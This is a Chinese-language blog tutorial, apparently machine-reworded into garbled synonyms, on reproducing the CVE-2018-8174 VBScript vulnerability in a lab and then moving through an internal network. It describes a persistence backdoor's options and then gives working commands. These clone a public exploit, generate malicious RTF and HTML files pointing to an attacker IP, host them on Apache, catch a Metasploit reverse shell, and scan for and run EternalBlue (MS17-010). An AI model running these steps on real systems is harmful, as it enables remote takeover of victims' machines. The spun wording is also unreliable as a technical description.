8174缝隙复现及内网渗透打击 8090安适门户
本文涉及的常识点: CVE-2018-8174缝隙复现、内网渗透、权限维持、脚本编程、陈迹断根、端口转发、操作MS17-010提权
CVE-2018-8174缝隙简介CVE-2018-8174是 Windows VBScript Engine 代码执行缝隙。由于VBScript脚本执行引擎(vbscript.dll)存在代码执行缝隙,打击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,长途打击者可以获取当前用户权限执行脚本中的恶意代码,该缝隙影响最新版本的IE浏览器及使用了IE内核的应用措施。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。在基于Web的打击情形中,打击者能通过Internet Explorer操作此缝隙的特定网站,然后诱使用户检察该网站。打击者还可以在承载IE泛起引擎的应用措施或Microsoft Office文档中嵌入符号为“安适初始化”的ActiveX控件。打击者还可以操作受到粉碎的网站和接受或托管用户供给的内容或告白的网站。这些网站可能包罗可能操作此缝隙的特制内容。
Persistence后门Persistence是一款使用安置自启动方法的长期性后门措施,读者可以操作 它创建注册和文件。
参数解释:
A: 自动启动Payload措施
S: 系统启动时自动加载
U: 用户登录时自动启动
X: 开机时自动加载
i: 回连的时间间隔
P: 监听反向连接端标语
r: 方针机器IP地点
环境搭建 拓扑图 Win server 2008 对Windows 7开启1433端口选择“打开或者封锁Windows防火墙”把防火墙打开,然后选择“高级设置”,选择“创建法则”来指定端口。
在“入站法则”里选择适才创建的法则,名称是“1433”,如下图所示
在属性对话框中,选择“长途IP地点”时,使用Windows7 的IP地点:172.20.10.177,配置完成后,Win server 2008 对Windows7告成开启1433端口
从github上克隆CVE-2018-8174的EXP到Kali Linux
git clone https://github.com/iBearcat/CVE-2018-8174_EXP.git
生成恶意html和rtf文件
cd CVE-2018-8174_EXP/
python CVE-2018-8174.py -u -o exploit.rtf -i 192.168.114.130 -p 4444
将恶意html文件移动到网站根目录,启动apache2处事
cp exploit.html /var/www/html/
service apache2 start
新打开一个终端,生成MSF监听
msfconsole -x "use exploit/multi/handler; set PAYLOAD Windows/shell/reverse_tcp; set LHOST 192.168.114.130; set lport 4444; run"受害者点击恶意链接
在kali里接收到了shell,可在meterpreter中打点shell
发明非打点员权限
使用MS17-010模块进行提权
use auxiliary/scanner/smb/smb_ms17_010
在运行该模块之前,需要设置相关选项,我们使用show options检察配 置信息
需要设置方针地点,设置命令:set RHOSTS 192.168.114.138
9.设置完成后,执行run或exploit命令,期待执行功效,发明存在永恒之蓝缝隙
10.使用缝隙操作模块
use exploit/Windows/smb/ms17_010_eternalblue
温馨提示: 本文由杰米博客推荐,转载请保留链接: https://www.jmwww.net/file/pc/12448.html